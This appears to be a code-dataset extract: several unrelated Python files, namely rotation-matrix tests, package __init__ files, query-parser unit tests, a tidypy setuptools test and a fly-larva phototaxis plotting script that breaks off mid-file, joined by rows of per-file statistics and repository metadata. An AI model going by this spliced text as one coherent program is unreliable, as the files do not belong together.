self.assertIsInstance(transforms.vex(transforms.rot2(0)), np.matrix)
    # ensure a 1x1 result if the matrix is 2x2
def test_transforms_dif_vex_validData_returnData_dimension2(self):
dimensions = transforms.vex(transforms.rot2(30)).shape
self.assertEqual(dimensions, (1, 1))
def test_transforms_dif_vex_validData_boundaryCondition_rot_0(self):
expected_mat = np.matrix([[0.], [0.], [0.]])
received_mat = transforms.vex(transforms.roty(0))
        if not matrices_equal(received_mat, expected_mat):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
    # TODO: check what is going on here
# def test_transforms_dif_vex_validData_boundaryCondition_roty_30(self):
# expected_mat = np.matrix([[0.], [-0.98803162], [0.]])
# received_mat = transforms.vex(transforms.roty(30))
#
# if not matrices_equal(received_mat, expected_mat, ):
# output_str = matrix_mismatch_string_builder(
# expected_mat, received_mat)
# self.fail(output_str)
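    # Note on the commented-out test above: numpy gives sin(30) ~= -0.98803162
    # when 30 is taken in radians, which matches the expected value, so roty()
    # here appears to interpret its angle in radians rather than degrees.
    # Quick standalone check (numpy only):
    #     >>> import numpy as np
    #     >>> np.sin(30)
    #     -0.9880316240928618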
# ---------------------------------------------------------------------------------------#
# Utility
# ---------------------------------------------------------------------------------------#
# unit
if __name__ == "__main__":
unittest.main()
| 43.445596 | 109 | 0.640872 | 7,433 | 58,695 | 4.719494 | 0.021929 | 0.02862 | 0.025228 | 0.017674 | 0.970468 | 0.96126 | 0.91394 | 0.866334 | 0.797121 | 0.776397 | 0 | 0.045942 | 0.228282 | 58,695 | 1,350 | 110 | 43.477778 | 0.728519 | 0.043189 | 0 | 0.587185 | 0 | 0 | 0.00585 | 0 | 0 | 0 | 0 | 0 | 0.069328 | 1 | 0.184874 | false | 0 | 0.005252 | 0 | 0.205882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f285c34e8c7c1687aedcf675a8c87f3989c79a09 | 186 | py | Python | torchgan/__init__.py | shubhsherl/torchgan | 3dd3757dfed7c1f95aa71a7cd71f199390eb5d6d | [
"MIT"
] | 1 | 2019-01-21T12:53:50.000Z | 2019-01-21T12:53:50.000Z | torchgan/__init__.py | shubhsherl/torchgan | 3dd3757dfed7c1f95aa71a7cd71f199390eb5d6d | [
"MIT"
] | null | null | null | torchgan/__init__.py | shubhsherl/torchgan | 3dd3757dfed7c1f95aa71a7cd71f199390eb5d6d | [
"MIT"
] | null | null | null | from torchgan import losses
from torchgan import models
from torchgan import trainer
from torchgan import metrics
from torchgan import logging
__version__ = 'v0.0.2'
name = "torchgan"
| 18.6 | 28 | 0.806452 | 26 | 186 | 5.615385 | 0.5 | 0.410959 | 0.616438 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018987 | 0.150538 | 186 | 9 | 29 | 20.666667 | 0.905063 | 0 | 0 | 0 | 0 | 0 | 0.075269 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.714286 | 0 | 0.714286 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4b31b918bb223798711dae59c5004d78b0768b10 | 18 | py | Python | cvc5_z3py_compat/__init__.py | aniemetz/cvc5_pythonic_api | 57d8c9d67e030a13296a94cf6ad7241f59192574 | [
"BSD-3-Clause"
] | null | null | null | cvc5_z3py_compat/__init__.py | aniemetz/cvc5_pythonic_api | 57d8c9d67e030a13296a94cf6ad7241f59192574 | [
"BSD-3-Clause"
] | null | null | null | cvc5_z3py_compat/__init__.py | aniemetz/cvc5_pythonic_api | 57d8c9d67e030a13296a94cf6ad7241f59192574 | [
"BSD-3-Clause"
] | null | null | null | from .z3 import *
| 9 | 17 | 0.666667 | 3 | 18 | 4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 0.222222 | 18 | 1 | 18 | 18 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4b7b35fce0bf989f98afc3a36c319585cb8a33fd | 9,761 | py | Python | bayesian_inference/probability/unit_test.py | yakuza8/bayesian-inference | a639e147c153cad85286ba7a04801164b5c82ac2 | [
"MIT"
] | 3 | 2020-06-19T05:37:44.000Z | 2022-02-02T02:15:45.000Z | bayesian_inference/probability/unit_test.py | yakuza8/bayesian-inference | a639e147c153cad85286ba7a04801164b5c82ac2 | [
"MIT"
] | null | null | null | bayesian_inference/probability/unit_test.py | yakuza8/bayesian-inference | a639e147c153cad85286ba7a04801164b5c82ac2 | [
"MIT"
] | null | null | null | from unittest import TestCase
from .probability import query_parser, QueryVariable
from ..exceptions.exceptions import NonUniqueRandomVariablesInQuery, RandomVariableNotInContext
__all__ = []
class TestProbabilityParser(TestCase):
def test_valid_expression_1(self):
query = 'A'
value, queries, evidences = query_parser(query=query)
self.assertTrue(value)
self.assertListEqual([QueryVariable('A')], queries)
self.assertListEqual([], evidences)
def test_valid_expression_2(self):
query = 'A, B, C'
value, queries, evidences = query_parser(query=query)
self.assertTrue(value)
self.assertListEqual([QueryVariable('A'), QueryVariable('B'), QueryVariable('C')], queries)
self.assertListEqual([], evidences)
def test_valid_expression_3(self):
query = 'A, B = b, C = c, D'
value, queries, evidences = query_parser(query=query)
self.assertTrue(value)
self.assertListEqual([QueryVariable('A'), QueryVariable('B', 'b'), QueryVariable('C', 'c'),
QueryVariable('D')], queries)
self.assertListEqual([], evidences)
def test_valid_expression_4(self):
query = 'B = b, A, C, D = D'
value, queries, evidences = query_parser(query=query)
self.assertTrue(value)
self.assertListEqual([QueryVariable('B', 'b'), QueryVariable('A'), QueryVariable('C'),
QueryVariable('D', 'D')], queries)
self.assertListEqual([], evidences)
def test_valid_expression_5(self):
query = 'A,B=b,C,D,E,F=f,G'
value, queries, evidences = query_parser(query=query)
self.assertTrue(value)
self.assertListEqual(
[QueryVariable('A'), QueryVariable('B', 'b'), QueryVariable('C'), QueryVariable('D'),
QueryVariable('E'), QueryVariable('F', 'f'), QueryVariable('G')], queries)
self.assertListEqual([], evidences)
def test_valid_expression_6(self):
query = ' B = b , A , C , D = D '
value, queries, evidences = query_parser(query=query)
self.assertTrue(value)
self.assertListEqual([QueryVariable('B', 'b'), QueryVariable('A'), QueryVariable('C'),
QueryVariable('D', 'D')], queries)
self.assertListEqual([], evidences)
def test_valid_expression_7(self):
query = 'A, B=b, C | D = d'
value, queries, evidences = query_parser(query=query)
self.assertTrue(value)
self.assertListEqual([QueryVariable('A'), QueryVariable('B', 'b'), QueryVariable('C')],
queries)
self.assertListEqual([QueryVariable('D', 'd')], evidences)
def test_valid_expression_8(self):
query = 'A, B=b, C | D = d, E = e'
value, queries, evidences = query_parser(query=query)
self.assertTrue(value)
self.assertListEqual([QueryVariable('A'), QueryVariable('B', 'b'), QueryVariable('C')],
queries)
self.assertListEqual([QueryVariable('D', 'd'), QueryVariable('E', 'e')], evidences)
def test_valid_expression_9(self):
query = 'A, B=b, C |D=d,E=e, F = f '
value, queries, evidences = query_parser(query=query)
self.assertTrue(value)
self.assertListEqual([QueryVariable('A'), QueryVariable('B', 'b'), QueryVariable('C')],
queries)
self.assertListEqual(
[QueryVariable('D', 'd'), QueryVariable('E', 'e'), QueryVariable('F', 'f')], evidences)
def test_invalid_expression_1(self):
query = ''
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_2(self):
query = ','
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_3(self):
query = ' , | '
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_4(self):
query = 'A ,'
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_5(self):
query = ', A'
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_6(self):
query = 'A | '
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_7(self):
query = 'A = a |'
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_8(self):
query = 'A = a | , '
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_9(self):
query = 'A = , '
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_10(self):
query = 'A = |'
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_11(self):
query = 'A = a | B'
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_12(self):
query = 'A = a | B, '
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_13(self):
query = 'A = a | B = b, '
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_14(self):
query = 'A = a, C | B = b | K '
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_15(self):
query = 'A K = a, C | B = b'
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_non_unique_valid_expression_1(self):
query = 'A, B, C, A, G'
with self.assertRaises(NonUniqueRandomVariablesInQuery):
query_parser(query=query)
def test_non_unique_valid_expression_2(self):
query = 'A, B, C | A = a, G = g'
with self.assertRaises(NonUniqueRandomVariablesInQuery):
query_parser(query=query)
def test_non_unique_valid_expression_3(self):
query = 'K | A = a, B = b, C = c, A = a, G = g'
with self.assertRaises(NonUniqueRandomVariablesInQuery):
query_parser(query=query)
def test_all_variables_exist_1(self):
query = 'A, B=b, C, D=d | E=e, F=ff, G=g, H=hh'
context = {
'A': ['a', 'aa'], 'B': ['b', 'bb'], 'C': ['c', 'cc'], 'D': ['d', 'dd'],
'E': ['e', 'ee'], 'F': ['f', 'ff'], 'G': ['g', 'gg'], 'H': ['h', 'hh']
}
value, queries, evidences = query_parser(query=query, expected_symbol_and_values=context)
self.assertTrue(value)
self.assertListEqual([QueryVariable('A'), QueryVariable('B', 'b'), QueryVariable('C'),
QueryVariable('D', 'd')], queries)
self.assertListEqual(
[QueryVariable('E', 'e'), QueryVariable('F', 'ff'), QueryVariable('G', 'g'),
QueryVariable('H', 'hh')], evidences)
def test_all_variables_exist_2(self):
query = 'A, B=b, C, D=d | E=e, F=ff, G=g, H=hh'
context = {
'A': ['a', 'aa'], 'B': ['b', 'bb'], 'D': ['d', 'dd'], 'E': ['e', 'ee'],
'F': ['f', 'ff'], 'G': ['g', 'gg'], 'H': ['h', 'hh']
}
with self.assertRaises(RandomVariableNotInContext) as e:
query_parser(query=query, expected_symbol_and_values=context)
self.assertTrue('C' in str(e.exception))
def test_all_variables_exist_3(self):
query = 'A, B=b, C, D=d | E=e, F=ff, G=g, H=hh'
context = {
'A': ['a', 'aa'], 'C': ['c', 'cc'], 'D': ['d', 'dd'], 'E': ['e', 'ee'],
'F': ['f', 'ff'], 'G': ['g', 'gg'], 'H': ['h', 'hh']
}
with self.assertRaises(RandomVariableNotInContext) as e:
query_parser(query=query, expected_symbol_and_values=context)
self.assertTrue('B' in str(e.exception))
def test_all_variables_exist_4(self):
query = 'A, B=b, C, D=d | E=e, F=ff, G=g, H=hh'
context = {
'A': ['a', 'aa'], 'B': ['bb'], 'C': ['c', 'cc'], 'D': ['d', 'dd'], 'E': ['e', 'ee'],
'F': ['f', 'ff'], 'G': ['g', 'gg'], 'H': ['h', 'hh']
}
with self.assertRaises(RandomVariableNotInContext) as e:
query_parser(query=query, expected_symbol_and_values=context)
self.assertTrue('B' in str(e.exception))
def test_all_variables_exist_5(self):
query = 'A, B=b, C, D=d | E=e, F=ff, G=g, H=hh'
context = {
'A': ['a', 'aa'], 'B': ['b', 'bb'], 'C': ['c', 'cc'], 'D': ['d', 'dd'],
'E': ['e', 'ee'], 'G': ['g', 'gg'], 'H': ['h', 'hh']
}
with self.assertRaises(RandomVariableNotInContext) as e:
query_parser(query=query, expected_symbol_and_values=context)
self.assertTrue('F' in str(e.exception))
def test_all_variables_exist_6(self):
query = 'A, B=b, C, D=d | E=e, F=ff, G=g, H=hh'
context = {
'A': ['a', 'aa'], 'B': ['b', 'bb'], 'C': ['c', 'cc'], 'D': ['d', 'dd'],
'E': ['e', 'ee'], 'F': ['f', 'ff'], 'G': ['gg'], 'H': ['h', 'hh']
}
with self.assertRaises(RandomVariableNotInContext) as e:
query_parser(query=query, expected_symbol_and_values=context)
self.assertTrue('G' in str(e.exception))
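# Informal summary of the query grammar exercised above (inferred from these
# tests, not a formal spec):
#     query       := assignments [ '|' assignments ]
#     assignments := var [ '=' value ] ( ',' var [ '=' value ] )*
# Variable names must be unique across the whole query, and when
# expected_symbol_and_values is supplied, every variable and every assigned
# value must exist in that context. Usage sketch:
#     ok, queries, evidences = query_parser(query='A, B=b | C=c')
#     # ok is True, queries == [QueryVariable('A'), QueryVariable('B', 'b')]
#     # and evidences == [QueryVariable('C', 'c')]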
| 39.840816 | 99 | 0.569921 | 1,159 | 9,761 | 4.655738 | 0.062985 | 0.069311 | 0.09785 | 0.128428 | 0.924203 | 0.89066 | 0.878058 | 0.871386 | 0.82487 | 0.799666 | 0 | 0.005425 | 0.263498 | 9,761 | 244 | 100 | 40.004098 | 0.745166 | 0 | 0 | 0.535354 | 0 | 0.035354 | 0.087389 | 0 | 0 | 0 | 0 | 0 | 0.292929 | 1 | 0.166667 | false | 0 | 0.015152 | 0 | 0.186869 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4b9a975edb897ebaa2736161c7849bc0b94b62cb | 900 | py | Python | test/test_setuptools.py | douardda/tidypy | 9d4c6470af8e0ca85209333a99787290f36498d4 | [
"MIT"
] | null | null | null | test/test_setuptools.py | douardda/tidypy | 9d4c6470af8e0ca85209333a99787290f36498d4 | [
"MIT"
] | null | null | null | test/test_setuptools.py | douardda/tidypy | 9d4c6470af8e0ca85209333a99787290f36498d4 | [
"MIT"
] | null | null | null |
import sys
import subprocess
import pytest
@pytest.mark.skipif(sys.platform == 'win32', reason='windows hates setuptools')
def test_default():
proc = subprocess.Popen(
['python', 'setup.py', 'tidypy'],
cwd='test/project1',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
)
out, err = proc.communicate()
assert out.startswith('running tidypy')
assert proc.returncode == 0
@pytest.mark.skipif(sys.platform == 'win32', reason='windows hates setuptools')
def test_options():
proc = subprocess.Popen(
['python', 'setup.py', 'tidypy', '--fail-on-issue', '--project-path=test/project1'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
)
out, err = proc.communicate()
assert out.startswith('running tidypy')
assert proc.returncode == 1
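# For reference, the shell equivalents of the two invocations exercised above:
#     cd test/project1 && python setup.py tidypy
#     python setup.py tidypy --fail-on-issue --project-path=test/project1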
| 25 | 92 | 0.648889 | 100 | 900 | 5.8 | 0.44 | 0.096552 | 0.055172 | 0.065517 | 0.865517 | 0.865517 | 0.865517 | 0.734483 | 0.734483 | 0.734483 | 0 | 0.011236 | 0.208889 | 900 | 35 | 93 | 25.714286 | 0.803371 | 0 | 0 | 0.538462 | 0 | 0 | 0.202673 | 0.03118 | 0 | 0 | 0 | 0 | 0.153846 | 1 | 0.076923 | false | 0 | 0.115385 | 0 | 0.192308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4ba1b42e2017e44331fb938675e1b792a9190d02 | 24,662 | py | Python | figure2_plot.py | arminbahl/drosophila_phototaxis_paper | e01dc95675f835926c9104b34bf6cfd7244dee2b | [
"MIT"
] | null | null | null | figure2_plot.py | arminbahl/drosophila_phototaxis_paper | e01dc95675f835926c9104b34bf6cfd7244dee2b | [
"MIT"
] | null | null | null | figure2_plot.py | arminbahl/drosophila_phototaxis_paper | e01dc95675f835926c9104b34bf6cfd7244dee2b | [
"MIT"
] | null | null | null | import pandas as pd
from pathlib import Path
import pylab as pl
import my_figure as myfig
from scipy.stats import ttest_ind, ttest_1samp
import numpy as np
from sklearn.linear_model import LinearRegression
root_path = Path("/Users/arminbahl/Desktop/preprocessed data/maxwell_paper")
# df = pd.read_hdf(root_path / "all_events.h5", key="results_figure2")
# df_histogram_results = pd.read_hdf(root_path / "all_events.h5", key="results_figure2_histograms")
# df_event_triggered_luminance = pd.read_hdf(root_path / "all_events.h5", key="event_triggered_luminance")
df = pd.read_hdf(root_path / "all_events_model_profile1.h5", key="results_figure2")
df_histogram_results = pd.read_hdf(root_path / "all_events_model_profile1.h5", key="results_figure2_histograms")
df_event_triggered_luminance = pd.read_hdf(root_path / "all_events_model_profile1.h5", key="event_triggered_luminance")
#df.to_excel(root_path / "all_events_figure2.xlsx", sheet_name="all_events_model.h5")
#df.groupby("experiment_name").mean().to_excel(root_path / "all_events_model_figure2_experiment_mean.xlsx", sheet_name="all_data")
fig = myfig.Figure(title="Figure 2")
##########
p0 = myfig.Plot(fig, num='a', xpos=1.5, ypos=22, plot_height=0.75, plot_width=1.5,
lw=1, pc='white', errorbar_area=False,
xl="Turn angle (deg)", xmin=-181, xmax=181, xticks=[-180, -90, 0, 90, 180],
yl="Probability", ymin=-0.001, ymax=0.012)
df_selected = df_histogram_results.query("experiment_name == 'virtual_valley_stimulus_drosolarva' and histogram_type == 'angle_change'").reset_index(level=['experiment_name', 'histogram_type'], drop=True)
myfig.Bar(p0, x=df_selected.index, y=df_selected["density"].values, lc='C0', lw=0, width=0.95*362/60)
##########
p0 = myfig.Plot(fig, num='b', xpos=4.5, ypos=22, plot_height=0.75, plot_width=1.5,
lw=1, pc='white', errorbar_area=False,
xl="Run length (s)", xmin=-0.5, xmax=60.5, xticks=[0, 30, 60],
yl="Probability", ymin=-0.001, ymax=0.06)
df_selected = df_histogram_results.query("experiment_name == 'virtual_valley_stimulus_drosolarva' and histogram_type == 'run_length'").reset_index(level=['experiment_name', 'histogram_type'], drop=True)
myfig.Bar(p0, x=df_selected.index, y=df_selected["density"].values, lc='C0', lw=0, width=0.95*61/60)
##########
df_selected = df_histogram_results.query("experiment_name == 'virtual_valley_stimulus_drosolarva' and histogram_type == 'luminance_change_since_previous_turn_event'").reset_index(level=['experiment_name', 'histogram_type'], drop=True)
p0 = myfig.Plot(fig, num='b', xpos=7.5, ypos=22, plot_height=0.75, plot_width=1.5,
lw=1, pc='white', errorbar_area=False,
xl="Brightness change during runs", xmin=-81, xmax=81, xticks=[-80, -40, 0, 40, 80],
yl="Probability", ymin=-0.001, ymax=df_selected["density"].values.max())
myfig.Bar(p0, x=df_selected.index, y=df_selected["density"].values, lc='C0', lw=0, width=0.95*162/60)
##########
df_selected = df_histogram_results.query("experiment_name == 'virtual_valley_stimulus_drosolarva' and histogram_type == 'luminance_change_during_current_turn_event'").reset_index(level=['experiment_name', 'histogram_type'], drop=True)
p0 = myfig.Plot(fig, num='b', xpos=10.5, ypos=22, plot_height=0.75, plot_width=1.5,
lw=1, pc='white', errorbar_area=False,
xl="Brightness change during turns", xmin=-81, xmax=81, xticks=[-80, -40, 0, 40, 80],
yl="Probability", ymin=-0.001, ymax=df_selected["density"].values.max())
myfig.Bar(p0, x=df_selected.index, y=df_selected["density"].values, lc='C0', lw=0, width=0.95*162/60)
##########
p0 = myfig.Plot(fig, num='e', xpos=14, ypos=22, plot_height=2, plot_width=1.5,
lw=1, pc='white', errorbar_area=True, hlines=[0], vlines=[0],
xl="Time relative to turn event (s)", xmin=-21.5, xmax=21.5, xticks=[-20, -10, 0, 10, 20],
yl="Brightness relative to turn event", ymin=-21, ymax=6, yticks=[-20, -10, 0])
myfig.Line(p0, x=df_event_triggered_luminance.index,
y=df_event_triggered_luminance.means_experiment,
yerr=df_event_triggered_luminance.sems_experiment,
lc='C0', lw=0.5, zorder=1)
myfig.Line(p0, x=df_event_triggered_luminance.index,
y=df_event_triggered_luminance.means_control,
yerr=df_event_triggered_luminance.sems_control,
lc='gray', lw=0.5, zorder=1)
##########
for experiment_name, x_pos, y_pos, color in [["virtual_valley_stimulus_drosolarva", 2, 19, "C0"],
["virtual_valley_stimulus_control_drosolarva", 2, 17, "gray"]]:
p0 = myfig.Plot(fig, num='b', xpos=x_pos, ypos=y_pos, plot_height=1.25, plot_width=0.375*24,
lw=1, pc='white', errorbar_area=False,
xl="", xmin=-0.5, xmax=23.5, xticks=[0, 1, 2.5, 3.5],
xticklabels=["Dark at current turn event",
"Bright at current turn event",
"Darkening since previous turn event",
"Brightening since previous turn event"] if experiment_name == "virtual_valley_stimulus_control_drosolarva" else [""]*4,
xticklabels_rotation=45,
yl="Absolute angle change (°)", ymin=-5, ymax=65, yticks=[0, 30, 60])
for i in range(2):
if i == 0:
angle_change0 = df.query("experiment_name == @experiment_name")[f"angle_change_at_current_turn_event_if_dark_at_current_turn_event"]
angle_change1 = df.query("experiment_name == @experiment_name")[f"angle_change_at_current_turn_event_if_bright_at_current_turn_event"]
if i == 1:
angle_change0 = df.query("experiment_name == @experiment_name")[f"angle_change_at_current_turn_event_if_darkening_since_previous_turn_event"]
angle_change1 = df.query("experiment_name == @experiment_name")[f"angle_change_at_current_turn_event_if_brightening_since_previous_turn_event"]
for j in range(len(angle_change0)):
x1 = np.random.random() * 0.2 - 0.1 + [0, 1, 2.5, 3.5, 6, 7, 8.5, 9.5, 11, 12, 13.5, 14.5, 16, 17, 19.5, 20.5, 22, 23][i * 2]
x2 = np.random.random() * 0.2 - 0.1 + [0, 1, 2.5, 3.5, 6, 7, 8.5, 9.5, 11, 12, 13.5, 14.5, 16, 17, 19.5, 20.5, 22, 23][i * 2 + 1]
y1 = angle_change0[j]
y2 = angle_change1[j]
myfig.Line(p0, x=[x1, x2], y=[y1, y2], lc=color, lw=0.25, zorder=1, alpha=0.5)
myfig.Scatter(p0, x=[x1], y=[y1], lc=color, pt='o', lw=0.25, ps=2, pc='white', zorder=2, alpha=0.5)
myfig.Scatter(p0, x=[x2], y=[y2], lc=color, pt='o', lw=0.25, ps=2, pc='white', zorder=2, alpha=0.5)
x1 = [0, 1, 2.5, 3.5][i * 2]
x2 = [0, 1, 2.5, 3.5][i * 2 + 1]
y1 = np.mean(angle_change0)
y2 = np.mean(angle_change1)
        myfig.Line(p0, x=[x1, x2], y=[y1, y2], lc=color, lw=1, zorder=3, alpha=0.9)
myfig.Scatter(p0, x=[x1, x2], y=[y1, y2], lc=color, pt='o', lw=0.25, ps=2, pc='white', zorder=4, alpha=0.9)
p = ttest_1samp(angle_change0 - angle_change1, 0, nan_policy='omit')[1]
print("Angle change statistical comparison", i, "Experiment", experiment_name, ": p = ", p, np.mean(angle_change0 - angle_change1), "n = ", len(angle_change0 - angle_change1))
myfig.Line(p0, x=[x1 + 0.1, x2 - 0.1], y=[55, 55], lc='black', lw=0.75)
if p < 0.001:
myfig.Text(p0, x1 + 0.5, 60, "***")
elif p < 0.01:
myfig.Text(p0, x1 + 0.5, 60, "**")
elif p < 0.05:
myfig.Text(p0, x1 + 0.5, 60, "*")
else:
myfig.Text(p0, x1 + 0.5, 60, "ns")
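        # Note: ttest_1samp on the pairwise differences is mathematically the
        # same as a paired t-test between the two conditions
        # (scipy.stats.ttest_rel); nan_policy='omit' drops any pair in which
        # either value is NaN, since the difference is then NaN too.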
##########
for experiment_name, x_pos, y_pos, color in [["virtual_valley_stimulus_drosolarva", 2, 11, 'C0'],
["virtual_valley_stimulus_control_drosolarva", 2, 9, "gray"]]:
p0 = myfig.Plot(fig, num='b', xpos=x_pos, ypos=y_pos, plot_height=1.25, plot_width=0.375*24,
lw=1, pc='white', errorbar_area=False,
xl="", xmin=-0.5, xmax=23.5, xticks=[0, 1, 2.5, 3.5],
xticklabels=["Dark at current turn event",
"Bright at current turn event",
"Darkening since previous turn event",
"Brightening since previous turn event",
] if experiment_name == "virtual_valley_stimulus_control_drosolarva" else [""]*4,
xticklabels_rotation=45,
yl="Time since previous turn event (s)", ymin=-1, ymax=51, yticks=[0, 25, 50])
for i in range(2):
if i == 0:
run_length0 = df.query("experiment_name == @experiment_name")[f"time_since_previous_turn_event_at_current_turn_event_if_dark_at_current_turn_event"]
run_length1 = df.query("experiment_name == @experiment_name")[f"time_since_previous_turn_event_at_current_turn_event_if_bright_at_current_turn_event"]
if i == 1:
run_length0 = df.query("experiment_name == @experiment_name")[f"time_since_previous_turn_event_at_current_turn_event_if_darkening_since_previous_turn_event"]
run_length1 = df.query("experiment_name == @experiment_name")[f"time_since_previous_turn_event_at_current_turn_event_if_brightening_since_previous_turn_event"]
        for j in range(len(run_length0)):
x1 = np.random.random() * 0.2 - 0.1 + [0, 1, 2.5, 3.5][i * 2]
x2 = np.random.random() * 0.2 - 0.1 + [0, 1, 2.5, 3.5][i * 2 + 1]
y1 = run_length0[j]
y2 = run_length1[j]
myfig.Line(p0, x=[x1, x2], y=[y1, y2], lc=color, lw=0.25, zorder=1, alpha=0.5)
myfig.Scatter(p0, x=[x1], y=[y1], lc=color, pt='o', lw=0.25, ps=1, pc='white', zorder=2, alpha=0.5)
myfig.Scatter(p0, x=[x2], y=[y2], lc=color, pt='o', lw=0.25, ps=1, pc='white', zorder=2, alpha=0.5)
x1 = [0, 1, 2.5, 3.5][i * 2]
x2 = [0, 1, 2.5, 3.5][i * 2 + 1]
y1 = np.mean(run_length0)
y2 = np.mean(run_length1)
        myfig.Line(p0, x=[x1, x2], y=[y1, y2], lc=color, lw=1, zorder=3, alpha=0.9)
myfig.Scatter(p0, x=[x1, x2], y=[y1, y2], lc=color, pt='o', lw=0.25, ps=2, pc='white', zorder=4, alpha=0.9)
p = ttest_1samp(run_length0 - run_length1, 0, nan_policy='omit')[1]
print("Run length statistical comparison", i, "Experiment", experiment_name, ": p = ", p, np.mean(run_length0 - run_length1), "n = ", len(run_length0 - run_length1))
myfig.Line(p0, x=[x1 + 0.1, x2 - 0.1], y=[50, 50], lc='black', lw=0.75)
if p < 0.001:
myfig.Text(p0, x1 + 0.5, 55, "***")
elif p < 0.01:
myfig.Text(p0, x1 + 0.5, 55, "**")
elif p < 0.05:
myfig.Text(p0, x1 + 0.5, 55, "*")
else:
myfig.Text(p0, x1 + 0.5, 55, "ns")
# Luminance change
##########
for experiment_name, x_pos, y_pos, color in [["virtual_valley_stimulus_drosolarva", 19, 19, "C0"],
["virtual_valley_stimulus_control_drosolarva", 19, 15, "gray"]]:
p0 = myfig.Plot(fig, num='e', xpos=x_pos, ypos=y_pos, plot_height=1.25, plot_width=0.375*3,
lw=1, pc='white', errorbar_area=False,
xl="", xmin=-0.5, xmax=2.5, xticks=[0, 1, 2], xticklabels=["Since previous turn event",
"During turn event", "kk"], xticklabels_rotation=45,
yl="Absolute brightness change", ymin=-5, ymax=65, yticks=[0, 30, 60])
for j in range(len(df.query("experiment_name == @experiment_name"))):
for i in range(2):
if i == 0:
luminance_change = df.query("experiment_name == @experiment_name")[f"luminance_change_since_previous_turn_event"]
if i == 1:
luminance_change = df.query("experiment_name == @experiment_name")[f"luminance_change_during_current_turn_event"]
x = np.random.random() * 0.2 - 0.1 + i
y = luminance_change[j]
myfig.Scatter(p0, x=[x], y=[y], lc=color, pt='o', lw=0.5, ps=2, pc='white', zorder=2, alpha=0.5)
if i > 0:
myfig.Line(p0, x=[x, previous_x], y=[y, previous_y], lc=color, lw=0.5, zorder=1, alpha=0.5)
previous_x = x
previous_y = y
for i in range(1):
if i == 0:
p = ttest_1samp(df.query("experiment_name == @experiment_name")[f"luminance_change_since_previous_turn_event"] -
df.query("experiment_name == @experiment_name")[f"luminance_change_during_current_turn_event"], 0, nan_policy='omit')[1]
myfig.Line(p0, x=[0.1 + i, 0.9 + i], y=[62, 62], lc='black', lw=0.75)
if p < 0.001:
myfig.Text(p0, 0.5 + i, 65, "***")
elif p < 0.01:
myfig.Text(p0, 0.5 + i, 65, "**")
elif p < 0.05:
myfig.Text(p0, 0.5 + i, 65, "*")
else:
myfig.Text(p0, 0.5 + i, 65, "ns")
# The individual event analysis
df = pd.read_hdf(root_path / "all_events_model_profile1.h5", key="all_events")
#df = pd.read_hdf(root_path / "all_events.h5", key="all_events")
for experiment_name in ["virtual_valley_stimulus_drosolarva", "virtual_valley_stimulus_control_drosolarva"]:
if experiment_name == "virtual_valley_stimulus_drosolarva":
ypos = 8
color = 'C0'
else:
ypos = 3
color = 'gray'
df_selected = df.query("experiment_name == @experiment_name and time_at_current_turn_event > 15*60 and time_at_current_turn_event <= 60*60")
df_selected.loc[:, "r_at_previous_turn_event"] = df_selected["r_at_current_turn_event"].shift(1).copy()
